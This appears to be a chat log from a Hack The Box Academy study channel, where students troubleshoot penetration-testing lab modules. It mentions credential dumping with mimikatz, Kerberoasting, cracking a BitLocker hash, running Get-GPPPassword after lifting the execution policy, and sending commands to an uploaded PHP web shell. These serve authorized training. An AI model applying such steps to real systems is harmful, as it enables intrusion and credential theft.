Omg, I just finished the Footprinting module. So much information, and for some reason the medium challenge didn't work on Pwnbox; too bad it took me days to figure that out lmao. Spent days on that, but only maybe an hour on Footprinting Hard
I think the command you use to get into the computer didn't work for me for some reason. Had to use an alternative. Saying it this way to avoid spoilers
Gotta give props to the HTB team. Genuinely made a great course and I'm absorbing information like a sponge
can I ask if this statement is true: when you run hashcat there's the potfile, right? Does the potfile consist of the ntds.dit and SYSTEM registry?
Guys, quick question if anyone can help.
if I got a SYSTEM shell on one of the machines in AD, but don't find any valid domain user on that system, i.e. no NTLM hash from mimikatz and no TGS accounts through Kerberoasting, what could be my next step in this scenario? Until now I don't have any domain user, just a local admin account on this machine. Is this something I can do with my SYSTEM shell on the current machine?
what module/section
no, potfile only contains cracked hashes
if whatever ntlm/aes hashes in ntds were cracked, potfile will record it, otherwise it won't be in there
I see. Thank you.
Did you try building the tool inside the machine? WEB01
Password Attacks module, section Credential Hunting in Linux: I'm not getting any output using hydra with the mutated wordlist. how much time does it take to complete? Because the flag is the password of the user Will.
hey y'all, working through Session Security atm and first time using Burp Suite; what do I configure the Firefox proxy to be? the default at 127 8080 or something specific to my pwnbox?
I've seen HTB staff say they don't want to have people brute-force for hours, so they try to keep it under 30 min
whatever port you want really
Phew! Just completed the Exploiting Web Vulnerabilities in Thick-Client Applications section of Attacking Common Applications, and it was a lot to take in! I followed what was taught in the section step by step. Even then, I was getting stuck in so many places. There is no way that I could have figured all these things out by myself. So, when taking CPTS, are we expected to do these things by ourselves? If so, can anyone give me some advice on how I can be better prepared?
I'm going in hoping it's just not in there 😂
I doubt everyone who passed knows Java applications that well too
You haven't taken CPTS yet? You were helping people out. So I thought you had already taken the exam
I’m guessing it’s not in the exam
Nah I started the path 2 months ago and just started helping with module I’ve done
You reached "Attacking Common Applications" within two months!
I started the path way before. I have been doing this for 7-8 months
How much time do you dedicate per day?
That part took me like 6 hours 😭
I have been doing this for the past 2-3 days.
I only do it for 2-3 hours per day though 🤐
I'm done with the path now and I spent like 6+ every day
No school, no internships🥲, no job, so just CPTS
When are you planning to take the exam?
Kerberos Attacks - Final Assessment
In the very last question I've done SSH local port forwarding to access the server machine, but after that RDP is very slow and laggy. Then I checked and I wasn't able to ping the initial access machine anymore. I tried restarting it a third time and now it's been loading for eons
CTRL+SHIFT+R
This month probably
Best of Luck!
Tried that already. seems like SSH local port forwarding and X11 forwarding are crashing the initial machine a lot
Thx
Just finished the sliver module, skills assessment was good practice
doubt it's crashing. try another browser.
make sure you have no adblock on
I'm trying on the Opera browser as of now. I did the whole module on this browser. I'm at the very last question
it's possible the platform is down, but no one else has said that, so it's probably your browser
you could also try another region
Check this: the initial access machine is crashing again and again just after I perform SSH tunnelling or X11 port forwarding, which is the intended path
Nothing wrong with my browser for sure
@cloud urchin
I've only seen that happen in 2 scenarios. 1) browser issue. this is the most common reason. 2) platform is down.
How is the browser affecting this if I'm accessing the machine from my Kali Linux?
you showed a picture of your browser where the target is spawning and stated it's been loading for eons
you aren't pinging your spawned target, you're pinging something else. you'd only get your spawned target ip if it actually spawned and the IP was visible to you in your browser.
The target is now loaded but the machine is very unstable. It pings, then it doesn't
use the TCP VPN if you're not on it, try another region.
This shouldn't be the case, because I'm at the very last question of the final assessment and everything was working well until I did the SSH tunnelling to access the internal domain-joined Windows machine, which messed everything up
ok then reach out to support on the website
Understood will do
I'd really suggest at minimum trying my troubleshooting steps first, aka another region and the TCP VPN
you might be surprised in the performance difference
I'm in the US and switching to the EU VPN was night and day
could not find anything with the whole wordlist.
Password Attacks module, hard lab. I'm trying to ||brute-force using mut wordlists for BitLocker. my command is john --wordlist=mut_password.list hash.hashes idk but it only gives a possible password with the whole wordlist, that is 123456789! || could anyone point me in the right direction?
I'm from the West Asia region
Have you tried the password?
ok, but you say there's a problem, I provide something to try, and you brush it off without trying... I can't really help you much more, especially when you don't take the basic troubleshooting steps
Only inside as user johanna, trying to open david's user profile. || did not work.||
I understand. I'm trying those solutions and I'm not trying to brush off anything
It’s bitlocker, so it’s a drive that’s locked
yes, I tried mounting it, got a lot of errors.
I downloaded it properly, I'm sure of it. I used smbget, generally used for larger files over SMB
Try a Windows VM if you can. I couldn't mount it on Linux
I think others were able to though
do you need password during mounting? or need password to open the drive after mounting?
After
okay thanks.
okay, I tried mounting it with Windows, password incorrect.
I don't get it, I used mut wordlists, password.list, used rockyou.txt for 4 hours.
pwnbox
Do you have hashcat on your host machine
yes
pwnbox
I hear hashcat is not good when the hash is collected via john
plus I feel john is used for this cracking.
I used hashcat on my windows host
does not matter. what matters is the wordlist. right?
Yeah, but it shouldn't take that long though
||should i run again with rockyou.txt? mut, plain password.list could not crack it.||
if you use the wrong wordlists, it's always gonna take long.
I did it with RY and got it in a few secs
Mutated is a lot shorter and it’s in there
Try the pass again
Dm the hash if you think it’s wrong
Module: Windows Privilege Escalation
Section: Citrix Breakout
Link to section: https://academy.hackthebox.com/module/67/section/2502
I'm having trouble launching the Citrix environment. I RDP'd to the machine using the provided credentials. Then I visited http://humongousretail.com/remote/, downloaded the client, and obtained the launch.ica file. After clicking to download the client, I got the file linuxx86-11.100.158406.tar.gz. I extracted the contents of this file but now I'm unsure how to proceed.
Iirc the ICA file should open the environment
That's what it says in the module. But am I supposed to do something with the linuxx86-11.100.158406.tar.gz archive?
I tried clicking on the monitor icon, but it just keeps downloading launch.ica files.
lemme check
I think I may have found it. I think I need to open the launch.ica file using the citrix receiver application. Trying it now.
Okay, it wasn't Citrix Receiver. Still stuck.
I just opened the ICA file and it worked
Was just trying that and it worked. I'd tried to give it execute permission earlier and launch it from the cmdline, but that didn't work for whatever reason. Just launched it from File Manager and it's connecting. Thanks.
I just clicked the download in the top right of Firefox
Does it take long to connect? It's been quite a while already.
Yup
try on Firefox
Had to reset the machine for it to work, thx.
the only reason I haven't 100%'d the module is because I can't access the Citrix Breakout content at all lol. it's too slow for me
Yeah, feeling the pain rn
Anyone know how to get out of the Citrix window? When I launched it, it went full screen and now I'm stuck 💀
Ended up just disconnecting to setup the file transfer since I couldn't find a way to minimize/escape it.
🤣 I was pressing the windows key and opening a new terminal every time
There's def a better way to do things
I think I may have to skip it for now as well due to the lag
Does anyone know what the reward is for keeping a streak of 30 weeks?
A badge
I was quite bummed out when I found out that was the "special reward" for keeping your streak 
you get a sense of pride and accomplishment
is it possible to copy-paste directly from the host to the Pwnbox without using the clipboard every time as a middleman to copy the info we need from the host to the Pwnbox?
works if you're using Chrome, I think
Yeah, in Chrome it's working. Thank you so much. Is there any way I can use this feature in Firefox too, if possible?
Attacking Enterprise Networks | Lateral Movement
Escalate privileges on the MS01 host and submit the contents of the flag.txt file on the Administrator Desktop.
I found the password for backadm, but when I try to connect to MS01 the output is:
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
I've been trying to connect since last night but it doesn't seem to work
Maybe that user isn't for MS01; also, I suggest doing the module blind
Don't read the questions or module material
Just work through it to DA without worrying about answering questions
I saw
the module specifies a connection via backupadm
I understand that
What I'm telling you is working through it without reading the q's
Authorization error generally means that the username or password didn't work
The questions lead you on, which defeats the purpose of doing it blind
You'll feel far better working through it blind imo
does anyone know if the Wayback Machine is up? (for the Info Gathering module)
spoilers
Make sure you're using the right pw bc there's 2 backup accounts
Don't see why it wouldn't be
Okay maybe I understand
thanks
all queries are giving a 503 error
I can visit the site just fine
Ah I see what you mean now
their API is taking a nap ¯\_(ツ)_/¯
☠️
I'll just move on to the next section then
I'll see if tools like finalrecon work
if not, then I'll probably leave it until the entire Internet Archive drama is over
Hey, follow the instructions in #welcome and get verified, share a screenshot please, pretty sure someone who has done it can help you!
Okay buddy
Cheers!
Hi, I am working on Attacking Common Applications, using my own Kali Linux. Specifically, I am trying to use joomla-brute.py right now in the Joomla section. I am a little concerned, I'm not sure why, I guess because it is taking a while. I am using rockyou.txt and I don't know if I am wasting my time or not. I assume this script is working because I am getting the pairs in red for fail, but it is not very verbose.
In addition to that, I was unable to use droopescan because of imp, and I messed with that a lot. I tried the docker route and I still could not find imp to get it to run. I think there have been some significant changes with Python in Kali recently. I don't know if I even need help, but I sure hope I am running the right list.
Yeah, a fair bit of the tools are outdated
Hey guys, I recently won HTB VIP+ in a CTF competition, but I don't want to use it now because of exams, so what is the expiry date of the code? I mean, is there any? I am new to the HTB thing
Droopescan worked fine for me
Ask support
Ok
lee is fast ⛈️
well, I ran the older tool. I am not sure that I need to get droopescan running to advance...
I remember fucking around with some stuff ¯\_(ツ)_/¯
maybe there are some new alternatives... I don't know what imp is. I guess Kali now has all the Python packages with the python prefix, and you have to make a venv, which is what I normally do anyway, but I could not find this imp that would not import, and it is my understanding that they got rid of the package... I was really surprised when I went the docker route and just got the same failure to import imp
kewl I already switched for smallers,
No idea about imp
me either
¯\_(ツ)_/¯
Can anyone help me with Hacking WordPress
The module, I'm stuck at the finding the directory indexing part 😦
I'm trying to execute Get-GPPPassword on a remote desktop and it isn't working. At first it was giving me this error:
.\Get-GPPPassword.ps1 : File C:\Users\bob\Downloads\Get-GPPPassword.ps1 cannot be loaded because running scripts is
disabled on this system. For more information, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\Get-GPPPassword.ps1
+ ~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
After I did some research I found and used this to allow me to run the script:
Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope Process
But now it's just running the script with no output or errors. Any help? Module: Windows Attacks & Defense: GPP Passwords
The correct list was in the example.
follow the module on how to use it
In the Nessus Skills Assessment in the Pentesting job path there are several times where there could be two answers, but it's only accepting one of them. Is this a bug or am I misunderstanding some things? For example, there are two readable shares and it only accepts one answer.
I did.
Yes, but I can't bcs I need to install something, and I can't do it bcs the host has no connection, if I'm not wrong
I have a good article on how to mount it on Linux, I'll show you when I'm home
did you? because just running the script like that is not the correct way to use it
I started with Import-Module first if that's what you are talking about. I got the same error for both. Is there something else I'm missing?
The problem with mounting it on the target host is that you need the administrator password, bcs you have no rights, so you have to transfer it to your own Windows machine. I'm gonna try to find the article for mounting it in Linux
Was the problem the .\ & .ps1?
Interesting. Thank you @next bronze and @solid quarry. Appreciate it. I thought the .\ was like "sudo", but I guess it doesn't work like that?
Mount it on your own system
Lol no
you've already imported the script, now you're calling a function inside it
nope, what you did there was first import a PowerShell script into your session. that script contains functions, and Get-GPPPassword is a function from this PowerShell script that will execute the attack
When you import a module, using .\ tells it to look in your cwd for the file to import
Where can I ask questions about Pro Labs like Dante?
Oh, that makes sense. My mistake came from auto-completing with tab instead of just writing it out. Thanks a bunch.
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
With that article I found it pretty easy to decrypt and read the file
Yeah, that's what I did ^^
#1263635449335910531 ; read and follow #welcome to access it
Still need help with that?
You have the api key, now you need to find another query to use it with.|| Look through all the queries to see which one uses a key as an argument||
I used the InQL Burp extension to help me build the query, saves some time
hello, for the last question I've been waiting 2 hours for the hash with Inveigh. are there some things I'm doing wrong?? I am administrator with the user found
https://academy.hackthebox.com/module/163/section/1549
https://academy.hackthebox.com/module/15/section/34
This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?
what will be the answer?
100% of the cubes you paid will be rewarded
thanks man
actually I tried 10 cubes, that's why I got an error :3
the answer makes no sense; I don't even know why it's written there
Open up a ticket in erratum, they messed that thing up
Hey bro, I haven’t been able to find the password.
Is it ok for you if i take a look at it to night?
When I click on the hint button there is no hint, only the page getting a little bit bigger. any clue why this is happening?
I'm working on the Burp Intruder section of the Using Web Proxies module. I'm meant to get the HTML of a certain file under the admin directory. I've tried every combination I can think of, but for the life of me, when I send the payload it doesn't stick to the /admin directory. Can anyone tell me how it's actually set up?
My get line is GET §/admin§.html HTTP/1.1
I've tried every combination of the above I can think of, but I just can't seem to get it to work. Any advice?
I'm sorry, I'm gonna ask a bunch of questions
but I am currently stuck on HyperText Transfer Protocol (HTTP) web requests
Give some more context. For example:
Module: X
Section: X
My question is when I do this X I get this X. I've tried X and X.
Your intruder payload is replacing the "/" at the beginning of the path, so unless your wordlist contains a "/" before each payload then it won't work right
it's the module Web Requests
You mean the wordlist I loaded in from common.txt? Or is it something to do with the format of my command?
and the section, I believe, is one
You need to do it like this: /§admin§.html
it asks me: "To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above." and gives me a DNS name to do it with, but it isn't making sense
Or I would guess so since as @onyx rapids mentioned, it would also replace the "/", with the command you've been running.
What have you tried so far?
It should look like this
I'll give it a shot when I'm back in like an hour, sudden family errand
But thank you! I'll report back 🫡
So curl -O -s, didn't give you anything?
in that format?
Yes
lemme try again brb
If you do GET §/admin§.html and you use common.txt, then each request will look like this:
advertise.html
advertisement.html
advertisers.html
advertising.html
This won't work because the / needs to be there before each payload. That forward slash might not seem important, but it's necessary for all requests
It should look like this:
/advertise.html
/advertisement.html
/advertisers.html
/advertising.html
The syntax you're looking for is also mentioned in the module. Just remember to include the download.php file in your url.
also, this should help in knowing the why
it stays as a DNS name?
yeah, does the target not matter then?
I'll DM you, that's a bit easier.
No worries.
in the Password Attacks module, section Passwd, Shadow & Opasswd, I am assuming getting the unhashed credentials will take some time?
hello guys
is shodan installed on Parrot for the CPTS path?
it seems it is not, and some of the modules have exercises using it
any ideas?
it is Footprinting, Domain Information
module
Hello, I'm working on the File Uploads Skills Assessment.
I think I'm almost done but stuck on the last step..
I succeeded in uploading PHP code and found the uploaded file.
But the only thing I can see from the URL is a blank image icon.
I tried to send ?cmd=ls commands to it, but it's not working.
Anyone can let me know what I'm doing wrong?
try another file type
I tried with pht.jpg and it was successfully uploaded.
Did I do something wrong?
exercises where?
if one doesn't work then try more file types
module/112/section/1061
Stuck on the IMAP & POP3 Footprinting module.
I was able to answer the first 4, but I'm not able to list directories or mailboxes using anything taught in the module to answer the last 2 questions.
I logged into the IMAP server, checked the namespace, ran a list "" "%" to get the directories, but can't use LSUB. I keep getting an LSUB Bad error
I don't think you can follow that unless you have shodan
that's why they don't ask a question at the end
I'm using the online VM
so should be ready
isn't
I don't think shodan is free to use
Can I DM the author of "User Behavior Forensics" module?
I thought I did it, I guess not
module Web Requests, section one I think
I'm having difficulties finding the flag
I've tried everything I can think of
Wym?
I solved it! Thanks a lot!
just curl download.php
no curl flags needed
hey, did you figure this out ?
Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer. I'm assuming as it is root it will take time. I used rockyou, as I didn't really know whether the given one would work
use the lists given
ahhh, ok lol
nope, not yet. found an interesting article I might try some stuff from though.
yeah, that doesn't give any results when using that one
yep, I was going to say that. I found that section to be lacking as well, unfortunately. This is the one that did it for me, but I'm sure there's many: https://nickb.dev/blog/introduction-to-imap/
LSUB also didn't work for me, until I realised that curl had already given me the list, so no more need to LSUB
i got it
did you use the mutated list?
yeah I did in the end, not sure why I didn't think to the first time round, just enjoyed 45 minutes of hashcat running rockyou 🤦♂️
I got the answer though. thank you
nice, this did it for me too. going to add this to my methodology doc. Thanks!
In Joomla - Discovery and Enumeration I found what appeared to be a valid version number in the admin joomla.xml manifest, yet when I go to enter that into Fingerprint the Joomla version box it's saying it's wrong — why?
try the other methods to verify
Well Python2.7 isn't even in the PwnBox APT repositories anymore which automatically throws one of the options out the window.
And droopescan is throwing around 20 different possible versions that would take forever to narrow down.
You can have fun refactoring code
But also make sure you pay attention to what is being output for the versions, like plug-ins and other stuff
Also make sure you're looking at the right subdomain
why is this SSH so slow
HTB is launching modules faster than I can unlock them and complete 
@onyx rapids @misty saddle not sure if either of you are still up, but I did what you guys asked and it's still not working
I did GET /§admin§.html HTTP/1.1 and GET /§admin.html§ HTTP/1.1 but neither of them are getting me the flag
I think what I'm meant to be doing is scanning every single .html file that is within the admin directory
but when attacking with the payload, it just gives me this format
with a bunch of numbers
it's not /admin/0.html or whatever it's meant to be, it just gets it from the root directory I guess
I think I figured it out, but it's just a matter of waiting and hoping for a flag
WE GOT IT
working on Web Attacks atm. Whenever I am using curl with my target IP and port I feel like I am never getting results or the intended results. Do I have to configure something in the terminal beforehand? Here is the command I am trying
curl -s "http://94.237.54.201:30740/documents.php" | grep "<li class='pure-tree_link'>"
can you link the section, i'll have a look
Try the script provided
Hello guys and girls, how are you all doing? I have a question I need help with. So, for HTB pentesting, they had Kali Linux through WSL (which I didn’t expect, so I deleted it today) and Parrot OS through VMware. However, I did things a bit differently. I just downloaded Linux as a VirtualBox VM, and now I’m planning to download Parrot the same way, so both will be on VirtualBox. The tricky part is that my Linux setup has some configurations (not too extensive, but still something). Should I delete it and start fresh, or should I just go ahead and set up both Linux and Parrot on VirtualBox?
You don't need both to be honest, pick one and stick with it. Parrot comes pre-loaded with tools, like Kali
If you want to build up your own Linux VM with tools as you go, that's fine too
It's really personal choice
I found the issue on my own. Anything between the §§ is something that is replaced for whatever reason, so when we were doing /§admin§.html, it would replace admin with literally everything. To search the /admin directory, we should've done /admin/§flag§.html or something for it to go through everything within the admin directory that ended with .html
Personally, I do like Linux, but they haven’t specifically said which distribution will be used throughout the course or path, or if both will be used.
Linux is not a distribution - it is more of the operating system. Debian, Ubuntu, Parrot, Kali, etc etc, those are distributions, so likely you have installed one of these?
The Academy uses the Pwnbox, which uses a Parrot image, if you choose to use the Pwnbox provided.
..but, you do not need to use the Pwnbox provided, you can indeed and without issue use your own VM, whatever distribution that may be
this part got me confused :
"
Among the most popular include, but not limited to:
ParrotOS (Pwnbox) Kali Linux BlackArch BackBox
In this case, we will deal with ParrotOS Security as our penetration testing distribution of choice.
VM Setup
"
then they start with Parrot, and that's what got me thinking or doubting which or what should be done next?
Hack The Box and ParrotOS (Parrot Linux) are partners, together.
The team who maintain and update Parrot are part of HTB
It is kept up to date with all the tools required in order to complete the Academy content
Okay, I guess I'll just keep Linux for my own use and use Pwnbox for the Parrot OS tasks. Would that be a correct approach?
I mean, there are no Parrot OS specific tasks
The only difference is that ParrotOS comes pre-loaded with the tools you'll need to use in order to progress through Academy modules
toyota vs honda, they're both cars, they will both take you to your destination, it's personal preference as to which one you want to use
You don't have to use it however, and can build up your own Linux installation, whatever distribution it may be with the tools you need as you go
Again, personal preference
Okay, thanks to both of you for the advice and good night then .
You're welcome 🙂
On Using Web Proxies > Skills Assessment, I'm so lost at this question:
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I have no idea what I'm meant to do. Since when could I just fuzz some characters? How do I even do that?
GET 3dac93b8cd250aa8c1a36fffc79a17a§{fuzzed_char}§ HTTP/1.1
this is what I have so far. I loaded the alphanum-case.txt into payload settings, and set payload processing to encode base64 and encode as ASCII hex, but I'm only getting one result and I don't think I'm doing it right
I seem to have issues with the targets in an early module, is it normal that my targets are in "spawning" status for more than 10 mins?
no, try ctrl+shift+r
It goes to "fetching status" to then go back to spawning
try another browser
make sure you have any ad blocker disabled, including things like Pi-hole
hmm, it finally timed out and then, after a retry, it showed me the targets
Use a different VPN server
@untold barn are you using a VM
Yes, I have tested on Kali and Parrot
you mentioned your RAM but unless you're allocating 32 GB RAM to your VM it's not going to utilize that much
how much are you allocating to your VM
I saw CPU usage was only ever at 10% but I will check RAM usage now, I currently allocate 8 GB RAM
RAM is also only 10%
I'm stuck on the module because this command is not reasonable lol
the command is reasonable, it's just something up with your setup
unless you're getting rate-limited as part of the module exercise
are you supposed to let the command finish?
right now it runs at 2 req/second. I tried -t 50 but I think it gives false negatives
The module mentions "
Let us repeat the first command we used, add the recursion flags to it while specifying .php as our extension, and see what results we get:
As we can see this time, the scan took much longer, sent almost six times the number of requests, and the wordlist doubled in size (once with .php and once without). Still, we got a large number of results, including all the results we previously identified, all with a single line of command.
"
But actually I cannot get any results because this one command on one IP with only 1 depth takes 5 days
maybe try respawning the target, using a different VPN region
The VPN only offers EU and USA for academy, but i live in Vietnam, the ping to both of those regions is around 200.
correction, i had checked another module and it only showed EU and USA. I have checked this module and it has the same regions as htb labs, i will swap regions. This is my bad
Now 250 rq a second, much better lol. Thank you 😄
Good morning. I'm stuck at Linux Fundamentals / File Descriptors and Redirections. Can someone tell how to find how many total packages are installed on the target system using find?
feck
hacked
I looked on forums and people use something apt but i haven't learnt how to use it yet in modules
Trolled the wrong channel 😦
Hi,
I am doing IIS Tilde Enumeration module. It says that we can discover the hidden directory secretDocuments by using the 8.3 format ~sec. But isn't it supposed to be numbers after ~ sign? I mean why is alphanumeric character after ~ that too not after a .?
Hi, I'm encountering an issue while using xfreerdp to connect to an RDP server. The certificate verification fails with a self-signed certificate error and a hostname mismatch warning. Here's a snippet of the error:
```
Common Name (CN): ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
The hostname (10.129.188.112) does not match the name in the certificate (ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL).
```
Active Directory Enum > LLMNR/NBT-NS Poisoning - from Windows.
You can ignore the error
but the connection still fails
The connection won't fail just from the error message you've provided
/cert:ignore
Hello, did you manage to find a way to get the double pivoting with Ligolo in the end?
Did you redirect using the internal ips
yes.
Attacker ===> ext__PIVOT 1__int <====> int Pivot 2
for the second tunnel, I tried to connect the agent in Pivot 2 to the internal address of Pivot 1
As FYI: Tunnel 1 works perfect
dm a pic of your listeners
honestly, can't remember. But probably lol
do you happen to have your notes about it, and would it be possible to share them?
I can find where they are for AEN. But ask away for whatever issue you have, and I may be able to help. I used Ligolo in Zephyr and Dante, which improved those skills a bit
Hey, from a legal perspective,
Is subdomain bruteforcing considered illegal activity?
Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.
Under Information Gathering Web Edition - Subdomain Bruteforcing
It depends
Inlanefreight.com is owned and controlled by htb
So they have allowed a broad scope
The legal perspective may change based on your country. As marice said, it's owned by HTB so you're fine. But if you are looking at other (non-HTB) sites and you were aggressive in your subdomain bruting, then perhaps. It could be seen as an attack if you're flooding the DNS with queries.
I'm in Using Web Proxies > Skill Assessment
How do I hexencode a value while fuzzing with ZAP? I've found a community script to do as much, but after installing it doesn't show up in my list of preprocessors. Has anyone solved this one using ZAP?
Finally done with the password attack module. it was a good module.
You need to enable the scripts at some point
you can also pre-encode: `echo -n "..." | xxd -p`
Hello, When will videos be added to the academy instead of just reading? it's too boring
now all platforms also have videos except htb
Folks, I'm planning to do the "Active Directory Trust Attacks" module in the Academy section. I wanted to know if each of the attacks explained is hands-on on both Linux and Windows? Or
Has anyone done that module?
hey guys, currently working on [ACL Enumeration academy]. I just really don't get this part: "What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration?" I'd appreciate the help, thank you
Thank you! 1) It's under "script", which I may not have seen, and 2) it works in Pwnbox, whereas on my Kali VM I swear I checked in scripts, but maybe not after enabling. 👍
I definitely remember it being a bit confusing but you do it once and then you're set
Yeah, I'll have to run through it again when I get back to my Kali VM.
Is there a way of leveraging arbitrary shell commands inside of ZAP to process payloads? Unfortunately I think encoding to hex is the last step in the process, so I can't pre-encode a list to a file and use that.